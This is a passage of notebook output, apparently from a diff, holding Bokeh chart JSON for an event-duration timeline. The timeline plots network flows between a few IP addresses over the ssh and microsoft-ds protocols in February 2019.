+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  var docs_json = {\"dcc6ab61-c11a-490a-96f1-05d748f4aca5\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"5876\"},{\"id\":\"5919\"}]},\"id\":\"5951\",\"type\":\"Column\"},{\"attributes\":{\"source\":{\"id\":\"5874\"}},\"id\":\"5918\",\"type\":\"CDSView\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.4},\"fill_color\":{\"value\":\"navy\"},\"height\":{\"value\":0.3},\"line_color\":{\"value\":\"navy\"},\"width\":{\"field\":\"Width\"},\"x\":{\"field\":\"Center\"},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"5907\"}}},\"id\":\"5909\",\"type\":\"Rect\"},{\"attributes\":{\"fill_alpha\":0.2,\"fill_color\":\"navy\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[2,2],\"line_width\":0.5,\"syncable\":false},\"id\":\"5945\",\"type\":\"BoxAnnotation\"},{\"attributes\":{},\"id\":\"5962\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"5965\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"data\":{\"Center\":{\"__ndarray__\":\"APjKOjuOdkIAWN3oPI52QgAYeqU+jnZC\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[3]},\"DestIP\":[\"10.0.3.5\",\"10.0.3.4\",\"104.211.30.1\"],\"L7Protocol\":[\"microsoft-ds\",\"ssh\",\"ssh\"],\"Row\":[0,1,2],\"SrcIP\":[\"10.0.3.4\",\"10.0.3.5\",\"10.0.3.5\"],\"Width\":{\"__ndarray__\":\"AAAAUFAHeEEAAAAAgB7HQAAAAID54EtB\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[3]},\"end_time\":{\"__ndarray__\":\"ACBzPkeOdkIAQE/qPI52QgCwiWNAjnZC\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[3]},\"index\":[0,1,2],\"start_time\":{\"__ndarray__\":\"ANAiNy+OdkIAcGvnPI52QgCAauc8jnZC\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[3]}},\"selected\":{\"id\":\"5962\"},\"selection_policy\":{\"id\":\"5963\"}},\"id\":\"5873\",\"type\":\"ColumnDataSource\"},{\"attributes\":{},\"id\":\"5957\",\"type\":\"AllLabels\"},{\"attributes\":{\"data_source\":{\"id\":\"5874\"},\"glyph\":{\"id\":\"5915\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"5916\"},\"view\":{\"id\":\"5918\"}},\"id\":\"5917\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"5966\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{},\"id\":\"5959\",\"type\":\"AllLabels\"},{\"attributes\":{},\"id\":\"5963\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"data\":{\"AllExtIPs\":[\"10.0.3.4\",\"10.0.3.5\",\"10.0.3.4\",\"10.0.3.5\",\"104.211.30.1\",\"104.211.30.1\",\"10.0.3.4\",\"10.0.3.5\"],\"AllowedInFlows\":{\"__ndarray__\":\"AAAAAAAAGEAAAAAAAAAAAAAAAAAAAAhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADwPw==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[8]},\"AllowedOutFlows\":{\"__ndarray__\":\"AAAAAAAAAAAAAAAAAAAYQAAAAAAAAAAAAAAAAAAACEAAAAAAAAAYQAAAAAAAAChAAAAAAAAA8D8AAAAAAAAAAA==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[8]},\"Center\":{\"__ndarray__\":\"APjKOjuOdkIA+Mo6O452QgD4yjo7jnZCAPjKOjuOdkIAGHqlPo52QgAYeqU+jnZCAFjd6DyOdkIAWN3oPI52Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[8]},\"DeniedInFlows\":{\"__ndarray__\":\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[8]},\"DeniedOutFlows\":{\"__ndarray__\":\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[8]},\"DestIP\":[\"10.0.3.5\",\"10.0.3.5\",\"10.0.3.5\",\"10.0.3.5\",\"104.211.30.1\",\"104.211.30.1\",\"10.0.3.4\",\"10.0.3.4\"],\"DestPort\":{\"__ndarray__\":\"AAAAAADQe0AAAAAAANB7QAAAAAAA0HtAAAAAAADQe0AAAAAAAAA2QAAAAAAAADZAAAAAAAAANkAAAAAAAAA2QA==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[8]},\"FlowDirection\":[\"I\",\"O\",\"I\",\"O\",\"O\",\"O\",\"O\",\"I\"],\"FlowEndTime\":{\"__ndarray__\":\"AIBi8SyOdkIAgGLxLI52QgCABL5FjnZCAIAEvkWOdkIAALxUO452QgCA4sM+jnZCAIBxVjuOdkIAgHFWO452Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[8]},\"FlowIntervalEndTime\":[\"2019-02-12 18:00:00.000\",\"2019-02-12 18:00:00.000\",\"2019-02-13 01:00:00.000\",\"2019-02-13 01:00:00.000\",\"2019-02-12 22:00:00.000\",\"2019-02-12 23:00:00.000\",\"2019-02-12 22:00:00.000\",\"2019-02-12 22:00:00.000\"],\"FlowStartTime\":{\"__ndarray__\":\"AIAn7CuOdkIAgCfsK452QgAAG5tFjnZCAAAbm0WOdkIAAEY+O452QgCA/988jnZCAIBxVjuOdkIAgHFWO452Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[8]},\"FlowType\":[\"IntraVNet\",\"IntraVNet\",\"IntraVNet\",\"IntraVNet\",\"IntraVNet\",\"IntraVNet\",\"IntraVNet\",\"IntraVNet\"],\"L4Protocol\":[\"T\",\"T\",\"T\",\"T\",\"T\",\"T\",\"T\",\"T\"],\"L7Protocol\":[\"microsoft-ds\",\"microsoft-ds\",\"microsoft-ds\",\"microsoft-ds\",\"ssh\",\"ssh\",\"ssh\",\"ssh\"],\"PublicIPs\":[\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\"],\"RemoteRegion\":[\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\"],\"ResourceGroup\":[\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\"],\"Row\":[0,0,0,0,2,2,1,1],\"SrcIP\":[\"10.0.3.4\",\"10.0.3.4\",\"10.0.3.4\",\"10.0.3.4\",\"10.0.3.5\",\"10.0.3.5\",\"10.0.3.5\",\"10.0.3.5\"],\"TenantId\":[\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\"],\"TimeGenerated\":{\"__ndarray__\":\"ANAiNy+OdkIA0CI3L452QgAgcz5HjnZCACBzPkeOdkIAgGrnPI52QgCwiWNAjnZCAHBr5zyOdkIAQE/qPI52Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[8]},\"TotalAllowedFlows\":{\"__ndarray__\":\"AAAAAAAAGEAAAAAAAAAYQAAAAAAAAAhAAAAAAAAACEAAAAAAAAAYQAAAAAAAAChAAAAAAAAA8D8AAAAAAADwPw==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[8]},\"VMIPAddress\":[\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\"],\"VMName\":[\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\"],\"VMRegion\":[\"eastus\",\"eastus\",\"eastus\",\"eastus\",\"eastus\",\"eastus\",\"eastus\",\"eastus\"],\"Width\":{\"__ndarray__\":\"AAAAUFAHeEEAAABQUAd4QQAAAFBQB3hBAAAAUFAHeEEAAACA+eBLQQAAAID54EtBAAAAAIAex0AAAAAAgB7HQA==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[8]},\"end_time\":{\"__ndarray__\":\"ACBzPkeOdkIAIHM+R452QgAgcz5HjnZCACBzPkeOdkIAsIljQI52QgCwiWNAjnZCAEBP6jyOdkIAQE/qPI52Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[8]},\"index\":[0,1,2,3,4,5,6,7],\"start_time\":{\"__ndarray__\":\"ANAiNy+OdkIA0CI3L452QgDQIjcvjnZCANAiNy+OdkIAgGrnPI52QgCAauc8jnZCAHBr5zyOdkIAcGvnPI52Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[8]}},\"selected\":{\"id\":\"5979\"},\"selection_policy\":{\"id\":\"5980\"}},\"id\":\"5938\",\"type\":\"ColumnDataSource\"},{\"attributes\":{},\"id\":\"5954\",\"type\":\"AllLabels\"},{\"attributes\":{},\"id\":\"5956\",\"type\":\"CategoricalTickFormatter\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"5936\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"5949\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"num_minor_ticks\":5,\"tickers\":[{\"id\":\"5981\"},{\"id\":\"5982\"},{\"id\":\"5983\"},{\"id\":\"5984\"},{\"id\":\"5985\"},{\"id\":\"5986\"},{\"id\":\"5987\"},{\"id\":\"5988\"},{\"id\":\"5989\"},{\"id\":\"5990\"},{\"id\":\"5991\"},{\"id\":\"5992\"}]},\"id\":\"5931\",\"type\":\"DatetimeTicker\"},{\"attributes\":{},\"id\":\"5926\",\"type\":\"LinearScale\"},{\"attributes\":{\"axis\":{\"id\":\"5930\"},\"ticker\":null},\"id\":\"5933\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"5924\",\"type\":\"DataRange1d\"},{\"attributes\":{\"data_source\":{\"id\":\"5938\"},\"glyph\":{\"id\":\"5940\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"5941\"},\"view\":{\"id\":\"5943\"}},\"id\":\"5942\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"formatter\":{\"id\":\"5936\"},\"major_label_policy\":{\"id\":\"5959\"},\"ticker\":{\"id\":\"5931\"}},\"id\":\"5930\",\"type\":\"DatetimeAxis\"},{\"attributes\":{},\"id\":\"5928\",\"type\":\"LinearScale\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"5898\",\"type\":\"PanTool\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"@end_time\":\"datetime\",\"@start_time\":\"datetime\"},\"tooltips\":[[\"SrcIP\",\"@SrcIP\"],[\"DestIP\",\"@DestIP\"],[\"L7Protocol\",\"@L7Protocol\"],[\"start_time\",\"@start_time{%F %T.%3N}\"],[\"end_time\",\"@end_time{%F %T.%3N}\"]]},\"id\":\"5875\",\"type\":\"HoverTool\"},{\"attributes\":{\"active_multi\":{\"id\":\"5944\"},\"tools\":[{\"id\":\"5944\"}]},\"id\":\"5934\",\"type\":\"Toolbar\"},{\"attributes\":{\"below\":[{\"id\":\"5930\"},{\"id\":\"5935\"}],\"center\":[{\"id\":\"5933\"}],\"height\":120,\"renderers\":[{\"id\":\"5942\"}],\"title\":{\"id\":\"5920\"},\"toolbar\":{\"id\":\"5934\"},\"toolbar_location\":null,\"width\":900,\"x_range\":{\"id\":\"5922\"},\"x_scale\":{\"id\":\"5926\"},\"y_range\":{\"id\":\"5924\"},\"y_scale\":{\"id\":\"5928\"}},\"id\":\"5919\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"end\":1550024807001.15,\"start\":1549992052485.85},\"id\":\"5922\",\"type\":\"Range1d\"},{\"attributes\":{\"source\":{\"id\":\"5938\"}},\"id\":\"5943\",\"type\":\"CDSView\"},{\"attributes\":{\"text\":\"Range Selector\"},\"id\":\"5920\",\"type\":\"Title\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"5899\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"5967\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"text\":\"Event Duration Timeline for SrcIP, DestIP, L7Protocol\"},\"id\":\"5877\",\"type\":\"Title\"},{\"attributes\":{},\"id\":\"5897\",\"type\":\"SaveTool\"},{\"attributes\":{},\"id\":\"5964\",\"type\":\"Selection\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"navy\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"navy\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":5},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"5913\"}}},\"id\":\"5916\",\"type\":\"Scatter\"},{\"attributes\":{\"fill_color\":{\"value\":\"blue\"},\"line_color\":{\"value\":\"blue\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"Row\"}},\"id\":\"5940\",\"type\":\"Circle\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"5975\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"5974\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"5972\",\"type\":\"DaysTicker\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"5981\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"5990\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"overlay\":{\"id\":\"5945\"},\"x_range\":{\"id\":\"5879\"},\"y_range\":null},\"id\":\"5944\",\"type\":\"RangeTool\"},{\"attributes\":{},\"id\":\"5980\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"below\":[{\"id\":\"5887\"}],\"center\":[{\"id\":\"5890\"},{\"id\":\"5893\"}],\"height\":300,\"left\":[{\"id\":\"5891\"}],\"min_border_left\":50,\"renderers\":[{\"id\":\"5911\"},{\"id\":\"5917\"}],\"title\":{\"id\":\"5877\"},\"toolbar\":{\"id\":\"5900\"},\"width\":900,\"x_range\":{\"id\":\"5879\"},\"x_scale\":{\"id\":\"5883\"},\"y_range\":{\"id\":\"5881\"},\"y_scale\":{\"id\":\"5885\"}},\"id\":\"5876\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{},\"id\":\"5979\",\"type\":\"Selection\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"5991\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"5894\",\"type\":\"WheelZoomTool\"},{\"attributes\":{},\"id\":\"5977\",\"type\":\"YearsTicker\"},{\"attributes\":{},\"id\":\"5992\",\"type\":\"YearsTicker\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"5976\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"5885\",\"type\":\"CategoricalScale\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"5982\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"axis\":{\"id\":\"5887\"},\"minor_grid_line_alpha\":0.3,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"5890\",\"type\":\"Grid\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"5986\",\"type\":\"DaysTicker\"},{\"attributes\":{\"source\":{\"id\":\"5873\"}},\"id\":\"5912\",\"type\":\"CDSView\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"5984\",\"type\":\"DaysTicker\"},{\"attributes\":{\"factors\":[\"10.0.3.4 / 10.0.3.5 / microsoft-ds\",\"10.0.3.5 / 10.0.3.4 / ssh\",\"10.0.3.5 / 104.211.30.1 / ssh\"]},\"id\":\"5881\",\"type\":\"FactorRange\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"5983\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"range\":null,\"value\":0.5},\"id\":\"5913\",\"type\":\"Dodge\"},{\"attributes\":{},\"id\":\"5892\",\"type\":\"CategoricalTicker\"},{\"attributes\":{\"axis\":{\"id\":\"5891\"},\"dimension\":1,\"grid_line_color\":null,\"ticker\":null},\"id\":\"5893\",\"type\":\"Grid\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"5989\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"axis_label\":\"SrcIP, DestIP, L7Protocol\",\"formatter\":{\"id\":\"5956\"},\"major_label_policy\":{\"id\":\"5954\"},\"ticker\":{\"id\":\"5892\"}},\"id\":\"5891\",\"type\":\"CategoricalAxis\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"5985\",\"type\":\"DaysTicker\"},{\"attributes\":{\"active_multi\":null,\"tools\":[{\"id\":\"5875\"},{\"id\":\"5894\"},{\"id\":\"5895\"},{\"id\":\"5896\"},{\"id\":\"5897\"},{\"id\":\"5898\"}]},\"id\":\"5900\",\"type\":\"Toolbar\"},{\"attributes\":{\"range\":null,\"value\":0.5},\"id\":\"5907\",\"type\":\"Dodge\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"5987\",\"type\":\"DaysTicker\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"5988\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"axis_label\":\"Event Time\",\"formatter\":{\"id\":\"5949\"},\"major_label_policy\":{\"id\":\"5957\"},\"ticker\":{\"id\":\"5888\"}},\"id\":\"5887\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"overlay\":{\"id\":\"5899\"}},\"id\":\"5895\",\"type\":\"BoxZoomTool\"},{\"attributes\":{},\"id\":\"5883\",\"type\":\"LinearScale\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"navy\"},\"line_alpha\":{\"value\":0.5},\"line_color\":{\"value\":\"navy\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":5},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"5913\"}}},\"id\":\"5915\",\"type\":\"Scatter\"},{\"attributes\":{\"data_source\":{\"id\":\"5873\"},\"glyph\":{\"id\":\"5909\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"5910\"},\"view\":{\"id\":\"5912\"}},\"id\":\"5911\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"navy\"},\"height\":{\"value\":0.3},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"navy\"},\"width\":{\"field\":\"Width\"},\"x\":{\"field\":\"Center\"},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"5907\"}}},\"id\":\"5910\",\"type\":\"Rect\"},{\"attributes\":{\"end\":1550023547212.1,\"start\":1549993312274.9},\"id\":\"5879\",\"type\":\"Range1d\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"blue\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"blue\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"Row\"}},\"id\":\"5941\",\"type\":\"Circle\"},{\"attributes\":{\"align\":\"right\",\"text\":\"Drag the middle or edges of the selection box to change the range in the main chart\",\"text_font_size\":\"10px\"},\"id\":\"5935\",\"type\":\"Title\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"5969\",\"type\":\"DaysTicker\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"5970\",\"type\":\"DaysTicker\"},{\"attributes\":{\"data\":{\"AllExtIPs\":[\"10.0.3.4\",\"10.0.3.5\",\"10.0.3.4\",\"10.0.3.5\",\"104.211.30.1\",\"104.211.30.1\",\"10.0.3.4\",\"10.0.3.5\"],\"AllowedInFlows\":{\"__ndarray__\":\"AAAAAAAAGEAAAAAAAAAAAAAAAAAAAAhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADwPw==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[8]},\"AllowedOutFlows\":{\"__ndarray__\":\"AAAAAAAAAAAAAAAAAAAYQAAAAAAAAAAAAAAAAAAACEAAAAAAAAAYQAAAAAAAAChAAAAAAAAA8D8AAAAAAAAAAA==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[8]},\"Center\":{\"__ndarray__\":\"APjKOjuOdkIA+Mo6O452QgD4yjo7jnZCAPjKOjuOdkIAGHqlPo52QgAYeqU+jnZCAFjd6DyOdkIAWN3oPI52Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[8]},\"DeniedInFlows\":{\"__ndarray__\":\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[8]},\"DeniedOutFlows\":{\"__ndarray__\":\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[8]},\"DestIP\":[\"10.0.3.5\",\"10.0.3.5\",\"10.0.3.5\",\"10.0.3.5\",\"104.211.30.1\",\"104.211.30.1\",\"10.0.3.4\",\"10.0.3.4\"],\"DestPort\":{\"__ndarray__\":\"AAAAAADQe0AAAAAAANB7QAAAAAAA0HtAAAAAAADQe0AAAAAAAAA2QAAAAAAAADZAAAAAAAAANkAAAAAAAAA2QA==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[8]},\"FlowDirection\":[\"I\",\"O\",\"I\",\"O\",\"O\",\"O\",\"O\",\"I\"],\"FlowEndTime\":{\"__ndarray__\":\"AIBi8SyOdkIAgGLxLI52QgCABL5FjnZCAIAEvkWOdkIAALxUO452QgCA4sM+jnZCAIBxVjuOdkIAgHFWO452Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[8]},\"FlowIntervalEndTime\":[\"2019-02-12 18:00:00.000\",\"2019-02-12 18:00:00.000\",\"2019-02-13 01:00:00.000\",\"2019-02-13 01:00:00.000\",\"2019-02-12 22:00:00.000\",\"2019-02-12 23:00:00.000\",\"2019-02-12 22:00:00.000\",\"2019-02-12 22:00:00.000\"],\"FlowStartTime\":{\"__ndarray__\":\"AIAn7CuOdkIAgCfsK452QgAAG5tFjnZCAAAbm0WOdkIAAEY+O452QgCA/988jnZCAIBxVjuOdkIAgHFWO452Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[8]},\"FlowType\":[\"IntraVNet\",\"IntraVNet\",\"IntraVNet\",\"IntraVNet\",\"IntraVNet\",\"IntraVNet\",\"IntraVNet\",\"IntraVNet\"],\"L4Protocol\":[\"T\",\"T\",\"T\",\"T\",\"T\",\"T\",\"T\",\"T\"],\"L7Protocol\":[\"microsoft-ds\",\"microsoft-ds\",\"microsoft-ds\",\"microsoft-ds\",\"ssh\",\"ssh\",\"ssh\",\"ssh\"],\"PublicIPs\":[\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\"],\"RemoteRegion\":[\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\"],\"ResourceGroup\":[\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\"],\"Row\":[0,0,0,0,2,2,1,1],\"SrcIP\":[\"10.0.3.4\",\"10.0.3.4\",\"10.0.3.4\",\"10.0.3.4\",\"10.0.3.5\",\"10.0.3.5\",\"10.0.3.5\",\"10.0.3.5\"],\"TenantId\":[\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\"],\"TimeGenerated\":{\"__ndarray__\":\"ANAiNy+OdkIA0CI3L452QgAgcz5HjnZCACBzPkeOdkIAgGrnPI52QgCwiWNAjnZCAHBr5zyOdkIAQE/qPI52Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[8]},\"TotalAllowedFlows\":{\"__ndarray__\":\"AAAAAAAAGEAAAAAAAAAYQAAAAAAAAAhAAAAAAAAACEAAAAAAAAAYQAAAAAAAAChAAAAAAAAA8D8AAAAAAADwPw==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[8]},\"VMIPAddress\":[\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\"],\"VMName\":[\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\"],\"VMRegion\":[\"eastus\",\"eastus\",\"eastus\",\"eastus\",\"eastus\",\"eastus\",\"eastus\",\"eastus\"],\"Width\":{\"__ndarray__\":\"AAAAUFAHeEEAAABQUAd4QQAAAFBQB3hBAAAAUFAHeEEAAACA+eBLQQAAAID54EtBAAAAAIAex0AAAAAAgB7HQA==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[8]},\"end_time\":{\"__ndarray__\":\"ACBzPkeOdkIAIHM+R452QgAgcz5HjnZCACBzPkeOdkIAsIljQI52QgCwiWNAjnZCAEBP6jyOdkIAQE/qPI52Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[8]},\"index\":[0,1,2,3,4,5,6,7],\"start_time\":{\"__ndarray__\":\"ANAiNy+OdkIA0CI3L452QgDQIjcvjnZCANAiNy+OdkIAgGrnPI52QgCAauc8jnZCAHBr5zyOdkIAcGvnPI52Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[8]}},\"selected\":{\"id\":\"5964\"},\"selection_policy\":{\"id\":\"5965\"}},\"id\":\"5874\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"5973\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"5971\",\"type\":\"DaysTicker\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"5968\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"num_minor_ticks\":10,\"tickers\":[{\"id\":\"5966\"},{\"id\":\"5967\"},{\"id\":\"5968\"},{\"id\":\"5969\"},{\"id\":\"5970\"},{\"id\":\"5971\"},{\"id\":\"5972\"},{\"id\":\"5973\"},{\"id\":\"5974\"},{\"id\":\"5975\"},{\"id\":\"5976\"},{\"id\":\"5977\"}]},\"id\":\"5888\",\"type\":\"DatetimeTicker\"},{\"attributes\":{},\"id\":\"5896\",\"type\":\"ResetTool\"}],\"root_ids\":[\"5951\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.2\"}};\n  var render_items = 